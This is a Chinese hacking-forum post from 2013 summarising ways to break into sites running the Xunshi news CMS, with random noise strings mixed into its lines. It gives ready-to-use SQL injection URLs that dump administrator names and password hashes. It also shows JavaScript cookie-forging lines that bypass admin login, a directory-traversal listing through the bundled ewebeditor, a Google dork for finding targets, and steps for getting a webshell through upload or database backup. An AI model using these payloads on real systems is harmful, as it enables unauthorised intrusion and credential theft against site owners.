找回密码
 立即注册
查看: 2826|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
' I5 d) c+ W" b# r2 h8 F( |) u% V  U. a" t! |& y8 h
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
0 h( s# g0 a' Y  ?( j5 {. R) B" T$ J6 @0 Y3 Q
以下本文总结来自黑防去年第9期杂志上的内容...
1 C# a; c  H6 K1 ?+ J' X6 c- p% p# Z+ ~! d& v1 a
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
5 K% e9 f; l# ~, j2 o4 _7 [( t& z% p
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
8 M2 P5 x( L4 e
- T9 s- Y1 N/ y: P记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况2 G9 R) p& R7 Q
这里一个注入! a3 j$ g/ X% ~3 `4 o% V! L
% z& J' @0 R( q* x6 H
效果如图:
5 M( D  I7 H4 W" r) _! a3 Z, E& J- y9 Z0 E  ~' ]: x9 ]; z
$ t. K* J) ^! W' Z4 q8 l

& y6 W5 C5 ]7 T这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.2 T! {2 y) b* l# x# G
/ V0 t/ Q  G# L* q. r  a# }
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
7 ]$ D2 U1 ?$ `- W* z3 d+ Y- z; g  |8 @2 r) q; A/ {
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
: B" z6 [1 `" x
4 z* l! \; Z" E% I( q那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:& j  U2 g% F4 D9 `

1 P% K5 m. g5 S6 L8 z因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
* j! {, l6 M+ |- u) I4 I- L0 {: ?% V. s6 n; K7 d1 R" O$ ~+ x; i5 p8 V; Q
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以% Q+ p* }; Q$ e9 C3 V( e: ?

8 X$ K8 Q8 a0 Z* J访问这页面来列目录..步骤如下:* U2 U$ V5 v9 a. H+ L  K
  g$ y$ t" H8 ?7 `
javascript:alert(document.cookie="admindj=1") ) U" H$ w0 Q, ^, Q( [, J8 a' X6 q" G: u
/ r; b- y: R8 q& i2 p% T# ~! N" y
http://www.political-security.co ... asp?id=46&dir=../..5 G5 C9 |( x, W: }
$ {' [1 ^0 K' O1 o! W
效果如图:, H1 w5 m( x( |4 V
  x. I% \7 K8 ?4 w
6 |5 j2 h2 ?: y* Y0 G8 T. R
' J& U1 s# o5 `: D) W
这样全站目录都能瞧了..找到后台目录..进去..0 e7 ?: \& ]; m; B. p' p

/ S7 _# v1 w6 e4 X2 }那么进了后台怎么拿shell??上传--备份就ok了..' P" S, j1 W" a6 f& \, h

# ~* p+ A6 R# y那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
" E% C: [; |$ P5 r+ g# j" f, O- R7 J" n- ?
这个我也碰到过一次..你都可以通过列目录来实现..
$ d7 W+ }- c( n3 u8 N7 D1 s, }9 w- g! d6 x* y
javascript:alert(document.cookie="admindj=1") 9 a4 F( D" [* y$ V8 H

1 o4 Q5 _6 p* m! I6 f( U, `. Shttp://www.political-security.co ... p?action=BackupData . e7 @, s# t# U" H( \( L
  a: \. ]# g5 T
备份ok..
7 ?4 g& Q( X! w' s/ q5 z% R
% v/ n+ E9 Y- a1 F  |# i那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
6 K0 w* W8 @& f) h# u5 A
3 n' z1 d" B6 z, w4 g, Z" q. J; w在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
# f5 X, b* d0 `0 J4 S
9 p3 m6 c3 e! G! W: }& @2 C5 Y然后访问此页面进行注入..步骤如下:
" W' n' {+ M+ v" ^9 o9 {" l6 s4 Q1 K
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
5 s2 }2 b: p4 |% d8 x
! f" g+ [6 D% m* s" j6 m3 n) B然后请求admin/admin_chk.asp页面7 Z0 y3 C& V' ?: t. j1 ?

7 {* w2 E: D% h# v输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
  e9 S* M+ a$ `* B: R) ~
: \0 M2 G0 Y# ^% t* ]4 q$ E26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin" ^4 B  ^( I# b1 Y% X$ |. E
4 \! F! Z, B, {4 t
效果如图所示:: @* C- ?2 K  Q, G* W
9 t  I' Q: n9 Y7 i, \9 B: ?

* }. u# a3 x  t1 F$ y! M/ r2 Z8 v/ e
讯时漏洞27 b! `- P$ G# v$ e; h, D
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
! y  j( n3 m5 L4 X 6 ?6 \5 K/ m% P( ]8 O, {% y
1、/admin/admin_news_pl_view.asp?id=1- F' ^. ]8 s( S. Q, i; F9 R) G
//id任意 填入以下语句3 `. Z7 y& ]. n5 s- J

  k5 k: f9 M5 A! }2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!1 c6 O% k6 s. g- J: v( o/ S; y$ z- f

& Z+ I& d0 q* v9 D& j* C: k1 G2 X3 u4 p' i8 M
4 G* e  R, F( o) y3 [: _
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
9 l" r+ ~# ]6 Q& Q
8 P, I. X/ d0 ], a$ `1 ?6 x- Z/ i: Y* i
/ s; ]( m# u. y3 x
爆出管理员帐号和密码了9 I: |! A4 d0 x' n+ U

) l% q& S. k4 q/ N: L! F; l& Y6 {; I, e
5 ~4 q/ ?" k0 \( L+ v# C
4、cookies进后台
, K7 i0 K; O+ X/ P
) K8 X2 d6 v/ T: @8 J3 s) hjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));: V. U( F# i' ~. G0 d+ u8 {. f

- Z( w; m  u5 m5 M/ b' p) j1 }: [/ i
! l; D; E1 p( T2 [6 Z4 F4 o* G6 y
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
( f" B8 A' K: k5 A8 @
  m, k5 m. h1 d5 e0 p1 D' X, [/ v. Q2 ~: G4 w) f6 e! b" E
: F9 s- j& Z, P* g$ }0 m
6、后台有上传和备份取SHELL不难。
4 y6 O7 a5 F3 W; b$ D" D
: X1 c6 q1 \8 G: h* |3 `7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
, r4 Y" ~  E2 q; o ! x( B) J* c! P) L: P
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
2 N5 {: w1 t" s% c. F. W. N3 b6 f7 H' D4 ~' U0 h. q
2 A: k2 O1 ~0 t& y& b6 y" R( c
& k6 R/ R- R% `/ @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表